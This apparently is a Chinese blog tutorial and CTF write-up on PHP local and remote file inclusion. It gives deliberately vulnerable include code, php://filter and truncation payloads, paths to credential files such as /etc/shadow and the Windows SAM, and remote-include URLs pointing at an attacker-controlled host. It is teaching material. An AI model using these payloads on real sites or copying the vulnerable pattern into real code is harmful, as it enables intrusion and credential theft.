<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  

  
  <title>文件包含 | 向北</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
  
  
  <meta name="description" content="文件包含[TOC] 0x01文件包含简介服务器在执行php文件时，可以通过文件包含函数加载另一个文件中的php代码,并 且当php来执行，这表示可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时，只要更新一个包含文件就可以了，或者想要向网站添加一张新页面时，只需要修改一下菜单文件，而不需要更新网页中的所有网页的链接 文件包含函数php中文件包含函数有以下四种 1234require()r">
<meta property="og:type" content="article">
<meta property="og:title" content="文件包含">
<meta property="og:url" content="https://erics-six.github.io/2019/11/22/文件包含/index.html">
<meta property="og:site_name" content="向北">
<meta property="og:description" content="文件包含[TOC] 0x01文件包含简介服务器在执行php文件时，可以通过文件包含函数加载另一个文件中的php代码,并 且当php来执行，这表示可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时，只要更新一个包含文件就可以了，或者想要向网站添加一张新页面时，只需要修改一下菜单文件，而不需要更新网页中的所有网页的链接 文件包含函数php中文件包含函数有以下四种 1234require()r">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/1.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/2.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/3.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/4.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/5.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/6.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/7.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/8.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/9.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/10.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/11.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/12.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/13.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/14.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/15.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/16.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/17.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/18.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/19.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/20.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/21.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/22.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/23.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/A.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/B.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/C.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/D.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/E.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/29.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/24.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/25.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/26.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/27.png">
<meta property="og:image" content="https://erics-six.github.io/2019/11/22/文件包含/28.png">
<meta property="og:updated_time" content="2019-11-22T13:28:37.821Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="文件包含">
<meta name="twitter:description" content="文件包含[TOC] 0x01文件包含简介服务器在执行php文件时，可以通过文件包含函数加载另一个文件中的php代码,并 且当php来执行，这表示可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时，只要更新一个包含文件就可以了，或者想要向网站添加一张新页面时，只需要修改一下菜单文件，而不需要更新网页中的所有网页的链接 文件包含函数php中文件包含函数有以下四种 1234require()r">
<meta name="twitter:image" content="https://erics-six.github.io/2019/11/22/文件包含/1.png">
  
    <link rel="alternate" href="/atom.xml" title="向北" type="application/atom+xml">
  
  
    <link rel="icon" href="/images/default-avatar.jpg">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/css/highlight.css">
</head>
</html>
<body>
  <div id="fullpage" class="mobile-nav-right">
    
      <div id="wrapper" title="图片来自网络">
    
    
      <header id="header">
  <div id="nav-toggle" class="nav-toggle"></div>
  <div class="head-box global-width">
    <nav class="nav-box nav-right">
      
        <a class="nav-item" href="/" title="">首页</a>
      
        <a class="nav-item" href="/archives" title="">归档</a>
      
    </nav>
  </div>
</header>
      <div id="middlecontent" title class="global-width sidebar-right">
        <section id="main"><article id="post-文件包含" class="article global-container article-type-post" itemscope="" itemprop="blogPost">
  
    <header class="article-header">
      
  
    <h1 class="article-title" itemprop="name">
      文件包含
    </h1>
  

    </header>
  
  <div class="article-meta">
    <a href="/2019/11/22/文件包含/" class="article-date">
  <time datetime="2019-11-22T04:16:23.000Z" itemprop="datePublished">2019-11-22</time>
</a>
    
    
  </div>
  
    <span id="busuanzi_container_page_pv">
      本文总阅读量<span id="busuanzi_value_page_pv"></span>次
    </span>
  

  <div class="article-inner">
    
    <div class="article-content article-content-cloud" itemprop="articleBody">
      
        <h3 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h3><p>[TOC]</p>
<h4 id="0x01文件包含简介"><a href="#0x01文件包含简介" class="headerlink" title="0x01文件包含简介"></a>0x01文件包含简介</h4><p>服务器在执行php文件时，可以通过文件包含函数加载另一个文件中的php代码,并 且当php来执行，这表示可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时，只要更新一个包含文件就可以了，或者想要向网站添加一张新页面时，只需要修改一下菜单文件，而不需要更新网页中的所有网页的链接</p>
<h5 id="文件包含函数"><a href="#文件包含函数" class="headerlink" title="文件包含函数"></a>文件包含函数</h5><p>php中文件包含函数有以下四种</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span>()</span><br><span class="line"><span class="keyword">require_once</span>()</span><br><span class="line"><span class="keyword">include</span>()</span><br><span class="line"><span class="keyword">include_once</span>()</span><br></pre></td></tr></table></figure></div>
<p><code>include</code>跟<code>require</code>的区别主要是<code>include</code>在包含的过程中如果出现错误，会抛出警告，但程序仍然继续正常运行；而<code>require</code>函数出现错误的时候，会直接报错并退出程序执行</p>
<p>而<code>include_once()</code>,<code>require_once()</code>这两个函数，与之前的不同之处在于这两个函数只包含一次。适用于脚本执行期间同一个文件有可能被包括超过一次的情况下，想确保它只被包括一次以避免函数重定义，变量重新赋值等问题</p>
<p><code>include</code> （或 <code>require</code>）语句会获取指定文件中存在的所有文本/代码/标记，并复制到使用 <code>include</code> 语句的文件中。包含文件很有用，如果您需要在网站的多张页面上引用相同的 PHP、HTML 或文本的话。</p>
<h6 id="php-include实例"><a href="#php-include实例" class="headerlink" title="php include实例"></a>php include实例</h6><p>I.假设有一个名为“footer.php”的标准的页脚文件</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;p&gt;Copyright © 2006-"</span>.date(<span class="string">"Y"</span>).<span class="string">" W3School.com.cn&lt;/p&gt;"</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<p>如果需要在一张页面中引用这个页脚文件，可以使用<code>include</code>语句：</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line"></span><br><span class="line">&lt;h1&gt;欢迎访问我们的首页！&lt;/h1&gt;</span><br><span class="line">&lt;p&gt;这是一个段落。/p&gt;</span><br><span class="line">&lt;p&gt;这是另一个段落。&lt;/p&gt;</span><br><span class="line">&lt;?php include &apos;footer.php&apos;;?&gt;</span><br><span class="line"></span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure></div>
<p>运行结果：</p>
<p><img src="/2019/11/22/文件包含/1.png" alt="1"></p>
<p>II. 有一个名为 “menu.php” 的标准菜单文件 </p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">'&lt;a href="/index.asp"&gt;首页&lt;/a&gt; -</span></span><br><span class="line"><span class="string">&lt;a href="/html/index.asp"&gt;HTML 教程&lt;/a&gt; -</span></span><br><span class="line"><span class="string">&lt;a href="/css/index.asp"&gt;CSS 教程&lt;/a&gt; -</span></span><br><span class="line"><span class="string">&lt;a href="/js/index.asp"&gt;JavaScript 教程&lt;/a&gt; -</span></span><br><span class="line"><span class="string">&lt;a href="/php/index.asp"&gt;PHP 教程&lt;/a&gt;'</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<p> 网站中的所有页面均使用此菜单文件。具体的做法是（我们使用了一个 <div> 元素，这样今后就可以轻松地通过 CSS 设置样式）： </div></p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line"></span><br><span class="line">&lt;div class=&quot;menu&quot;&gt;</span><br><span class="line">&lt;?php include &apos;menu.php&apos;;?&gt;</span><br><span class="line">&lt;/div&gt;</span><br><span class="line"></span><br><span class="line">&lt;h1&gt;欢迎访问我的首页！&lt;/h1&gt;</span><br><span class="line">&lt;p&gt;Some text.&lt;/p&gt;</span><br><span class="line">&lt;p&gt;Some more text.&lt;/p&gt;</span><br><span class="line"></span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure></div>
<p>运行结果：</p>
<p><img src="/2019/11/22/文件包含/2.png" alt="2"></p>
<p>III. 有一个名为 “vars.php” 的文件，其中定义了一些变量： </p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$color=<span class="string">'银色的'</span>;</span><br><span class="line">$car=<span class="string">'奔驰轿车'</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<p> 如果我们引用这个 “vars.php” 文件，就可以在调用文件中使用这些变量： </p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line"></span><br><span class="line">&lt;h1&gt;欢迎访问我的首页！&lt;/h1&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">include &apos;vars.php&apos;;</span><br><span class="line">echo &quot;我有一辆&quot; . $color . $car &quot;。&quot;;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure></div>
<p>运行结果：</p>
<p><img src="/2019/11/22/文件包含/3.png" alt="3"></p>
<h6 id="require运行实例"><a href="#require运行实例" class="headerlink" title="require运行实例"></a>require运行实例</h6><p>延用上面的第三个例子</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line"></span><br><span class="line">&lt;h1&gt;Welcome to my home page!&lt;/h1&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">require &apos;noFileExists.php&apos;;</span><br><span class="line">echo &quot;I have a&quot;.$color.$car.&quot;。&quot;;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure></div>
<h5 id="漏洞产生原因"><a href="#漏洞产生原因" class="headerlink" title="漏洞产生原因"></a>漏洞产生原因</h5><p>文件包含函数加载的参数没有经过过滤或严格的定义，可以被用户控制，包含其他恶意文件，导致了执行了非预期的代码</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $filename  = $_GET[<span class="string">'filename'</span>];</span><br><span class="line">    <span class="keyword">include</span>($filename);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<p>ex：</p>
<p><code>$_GET[&#39;filename&#39;]</code>参数，开发者没有经过严格的过滤，直接带入了<code>include</code>函数，攻击者可以修改<code>$_GET[&#39;filename&#39;]</code>的值，进行攻击</p>
<h4 id="0x02文件包含类型"><a href="#0x02文件包含类型" class="headerlink" title="0x02文件包含类型"></a>0x02文件包含类型</h4><h5 id="本地文件包含漏洞-Local-File-Include"><a href="#本地文件包含漏洞-Local-File-Include" class="headerlink" title="本地文件包含漏洞(Local File Include)"></a>本地文件包含漏洞(Local File Include)</h5><p>指的是能打开并包含本地文件的漏洞，大部分情况下遇到的文件包含都是LFI，无论包含的文件后缀名是什么类型，只要里面的内容是php代码，他就会解析为php文件</p>
<p>漏洞代码</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $filename  = $_GET[<span class="string">'filename'</span>];</span><br><span class="line">    <span class="keyword">include</span>($filename);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<p>单纯的从URL判断，可以通过<em>path、dir、file、pag、page、archive、p、eng、语言文件</em>等关键字眼，判断可能存在文件包含漏洞</p>
<h6 id="I-一般是利用文件包含获取index-php的源码"><a href="#I-一般是利用文件包含获取index-php的源码" class="headerlink" title="I.一般是利用文件包含获取index.php的源码"></a>I.一般是利用文件包含获取index.php的源码</h6><p><code>......./index.php?关键字眼=php://filter/convert.base64-encode/resource=index.php</code></p>
<p>有时候题目出的简单点，可以直接是读取flag.php的源码</p>
<h6 id="II-其他利用：通过目录遍历漏洞获取到系统中的其他文件内容，"><a href="#II-其他利用：通过目录遍历漏洞获取到系统中的其他文件内容，" class="headerlink" title="II.其他利用：通过目录遍历漏洞获取到系统中的其他文件内容，"></a>II.其他利用：通过目录遍历漏洞获取到系统中的其他文件内容，</h6><p>测试一下</p>
<p><img src="/2019/11/22/文件包含/4.png" alt="4"></p>
<p>常见的敏感信息路径</p>
<p>Windows系统</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="TAGGERSCRIPT"><figure class="iseeu highlight /taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">c:<span class="symbol">\b</span>oot.ini // 查看系统版本</span><br><span class="line">c:<span class="symbol">\w</span>indows<span class="symbol">\s</span>ystem32<span class="symbol">\i</span>netsrv<span class="symbol">\M</span>etaBase.xml // IIS配置文件</span><br><span class="line">c:<span class="symbol">\w</span>indows<span class="symbol">\r</span>epair<span class="symbol">\s</span>am // 存储Windows系统初次安装的密码</span><br><span class="line">c:<span class="symbol">\P</span>rogramFiles<span class="symbol">\m</span>ysql<span class="symbol">\m</span>y.ini // MySQL配置</span><br><span class="line">c:<span class="symbol">\P</span>rogramFiles<span class="symbol">\m</span>ysql<span class="symbol">\d</span>ata<span class="symbol">\m</span>ysql<span class="symbol">\u</span>ser.MYD // MySQL root密码</span><br><span class="line">c:<span class="symbol">\w</span>indows<span class="symbol">\p</span>hp.ini // php 配置信息</span><br></pre></td></tr></table></figure></div>
<p>Linux/Unix</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="DTS"><figure class="iseeu highlight /dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta-keyword">/etc/</span>passwd <span class="comment">// 账户信息</span></span><br><span class="line"><span class="meta-keyword">/etc/</span>shadow <span class="comment">// 账户密码文件</span></span><br><span class="line"><span class="meta-keyword">/usr/</span>local<span class="meta-keyword">/app/</span>apache2<span class="meta-keyword">/conf/</span>httpd.conf <span class="comment">// Apache2默认配置文件</span></span><br><span class="line"><span class="meta-keyword">/usr/</span>local<span class="meta-keyword">/app/</span>apache2<span class="meta-keyword">/conf/</span>extra/httpd-vhost.conf <span class="comment">// 虚拟网站配置</span></span><br><span class="line"><span class="meta-keyword">/usr/</span>local<span class="meta-keyword">/app/</span>php5<span class="meta-keyword">/lib/</span>php.ini <span class="comment">// PHP相关配置</span></span><br><span class="line"><span class="meta-keyword">/etc/</span>httpd<span class="meta-keyword">/conf/</span>httpd.conf <span class="comment">// Apache配置文件</span></span><br><span class="line"><span class="meta-keyword">/etc/</span>my.conf <span class="comment">// mysql 配置文件</span></span><br></pre></td></tr></table></figure></div>
<h6 id="III-00截断"><a href="#III-00截断" class="headerlink" title="III.%00截断"></a>III.%00截断</h6><p>适用于<em>file_get_contents,include,file_exists</em>等</p>
<p>截断利用条件：</p>
<p><em>GPC( magic_quotes_gpc )=OFF,</em></p>
<p><em>PHP版本&lt;5.3.4,</em></p>
<p><em>不能被addslashes等函数处理(会影响空白字符)处理，</em></p>
<p>测试代码：</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> $_GET[<span class="string">'a'</span>].<span class="string">'.php'</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<p>本来想要本地测试一下的，但是include_path出了问题，只能借用一下师傅的图啦<img src="/2019/11/22/文件包含/5.png" alt="5"></p>
<p>2.txt内容</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> phpinfo(); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<h6 id="IV-路径长度截断"><a href="#IV-路径长度截断" class="headerlink" title="IV.路径长度截断"></a>IV.路径长度截断</h6><p>利用多个英文句号(.)和反斜杠(/)来截断</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="LSL"><figure class="iseeu highlight /lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Windows下目录最大长度为<span class="number">256</span>字节，超出部分会被丢弃</span><br><span class="line">Linux下目录最大长度为<span class="number">4096</span>字节，超出部分会被丢弃</span><br></pre></td></tr></table></figure></div>
<p><em>条件：无视(GPC) ver&lt;5.3.4</em></p>
<p>测试代码：</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $filename  = $_GET[<span class="string">'filename'</span>];</span><br><span class="line">    <span class="keyword">include</span>($filename . <span class="string">".html"</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<p>playload<img src="/2019/11/22/文件包含/6.png" alt="6"></p>
<h6 id="V-点号截断"><a href="#V-点号截断" class="headerlink" title="V.点号截断"></a>V.点号截断</h6><p>条件：Windows OS，点号需要长于256</p>
<p>测试代码：</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $filename  = $_GET[<span class="string">'filename'</span>];</span><br><span class="line">    <span class="keyword">include</span>($filename . <span class="string">".html"</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<p>playload<img src="/2019/11/22/文件包含/7.png" alt="7"> </p>
<h6 id="实战LFI"><a href="#实战LFI" class="headerlink" title="实战LFI"></a>实战LFI</h6><p>刚好最近攻防世界做了一道是这个类型的（上面目录遍历漏洞利用的是这个题目链接）</p>
<p><img src="/2019/11/22/文件包含/8.png" alt="8"></p>
<p>进去随便点了点，发现页面跳出了个index，再看看url:page=,有木有觉得很熟悉，输入啥他就会显示啥，初步目测文件包含</p>
<p><img src="/2019/11/22/文件包含/9.png" alt="9"></p>
<p>不管是不是先试一下</p>
<p><code>playload:http://111.198.29.45:40720/index.php?page=php://filter/convert.base64-encode/resource=index.php</code></p>
<p><img src="/2019/11/22/文件包含/10.png" alt="10"></p>
<p>bingguo~然后base64解码出他的源代码</p>
<p><img src="/2019/11/22/文件包含/11.png" alt="11"></p>
<h5 id="远程文件包含漏洞-Remote-File-Inclusion"><a href="#远程文件包含漏洞-Remote-File-Inclusion" class="headerlink" title="远程文件包含漏洞(Remote File Inclusion)"></a>远程文件包含漏洞(Remote File Inclusion)</h5><p>是指能够包含远程服务器上的文件并执行，而远程服务器上的文件我们可以随意更改，通过url地址对远程的文件进行包含</p>
<p>条件：</p>
<p>需要在目标主机的php.ini中进行配置</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">allow_url_fopen = On(是否允许打开远程文件)</span><br><span class="line">allow_url_include = On(是否允许<span class="keyword">include</span>/<span class="keyword">require</span>远程文件)</span><br></pre></td></tr></table></figure></div>
<p> 在php.ini中，allow_url_fopen默认一直是On，而allow_url_include从php5.2之后就默认为Off </p>
<h6 id="I-无限制远程文件包含漏洞"><a href="#I-无限制远程文件包含漏洞" class="headerlink" title="I.无限制远程文件包含漏洞"></a>I.无限制远程文件包含漏洞</h6><p>测试代码</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $filename  = $_GET[<span class="string">'filename'</span>];</span><br><span class="line">    <span class="keyword">include</span>($filename);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<p>通过远程文件包含漏洞，包含php.txt可以解析</p>
<p>Playload：</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="AWK"><figure class="iseeu highlight /awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="regexp">//</span>www.ctfs-wiki.com<span class="regexp">/FI/</span>FI.php?filename=http:<span class="regexp">//</span><span class="number">192.168</span>.<span class="number">91.133</span><span class="regexp">/FI/</span>php.txt</span><br></pre></td></tr></table></figure></div>
<p>测试结果：<img src="/2019/11/22/文件包含/12.png" alt="12"></p>
<h6 id="II-有限制远程文件包含漏洞"><a href="#II-有限制远程文件包含漏洞" class="headerlink" title="II.有限制远程文件包含漏洞"></a>II.有限制远程文件包含漏洞</h6><p>测试代码：</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">include</span>($_GET[<span class="string">'filename'</span>] . <span class="string">".html"</span>); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
<p>代码中多添加了html后缀，因此远程包含的文件也会多了一个html的后缀</p>
<p><img src="/2019/11/22/文件包含/13.png" alt="13"></p>
<p>我们可以通过？、#、空格绕过</p>
<p>Playload：</p>
<div class="highlight-box" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="AWK"><figure class="iseeu highlight /awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span>.http:<span class="regexp">//</span>www.ctfs-wiki.com<span class="regexp">/FI/</span>WFI.php?filename=http:<span class="regexp">//</span><span class="number">192.168</span>.<span class="number">91.133</span><span class="regexp">/FI/</span>php.txt?</span><br><span class="line"><span class="number">2</span>.http:<span class="regexp">//</span>www.ctfs-wiki.com<span class="regexp">/FI/</span>WFI.php?filename=http:<span class="regexp">//</span><span class="number">192.168</span>.<span class="number">91.133</span><span class="regexp">/FI/</span>php.txt%<span class="number">23</span></span><br><span class="line"><span class="number">3</span>.http:<span class="regexp">//</span>www.ctfs-wiki.com<span class="regexp">/FI/</span>WFI.php?filename=http:<span class="regexp">//</span><span class="number">192.168</span>.<span class="number">91.133</span><span class="regexp">/FI/</span>php.txt%<span class="number">20</span></span><br></pre></td></tr></table></figure></div>
